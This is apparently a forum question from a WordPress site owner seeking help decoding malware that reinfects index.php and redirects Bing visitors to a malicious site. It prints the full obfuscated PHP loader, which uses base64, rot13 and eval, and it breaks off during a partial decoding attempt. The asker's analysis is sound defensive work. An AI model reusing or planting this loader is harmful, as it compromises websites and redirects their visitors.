# WordPress malware help to decode $O_OO0O0_0_=urldecode("%6f%41%2d%62%4e%6e%4b%37

Tags: wordpress, redirect, decode, malware, urldecode

I have some infected WordPress websites with malware, and below you have a sample of it:

First:

https://github.com/rocryptogroup/wordpress-malware/blob/main/index

Second:

```
<?php $L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__)); $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L66Rgr[1]))));$L7CRgr = "b3d0380aa64745d551071e4546a1fa7a";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=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
```

GitHub malware was found into *index.php* and if I remove it, the virus will rewrite the *index.php* file.

It has *www-data* access to the server.

How can I see what's in the obfuscated code?
The effect is when I search on [Bing](https://en.wikipedia.org/wiki/Microsoft_Bing) my website, malware redirects me to the malicious website.

EDIT://
Trying to decode:

```
<?php
$O_OO0O0_0_=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");
$O000OO___O=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[13].$O_OO0O0_0_[31];
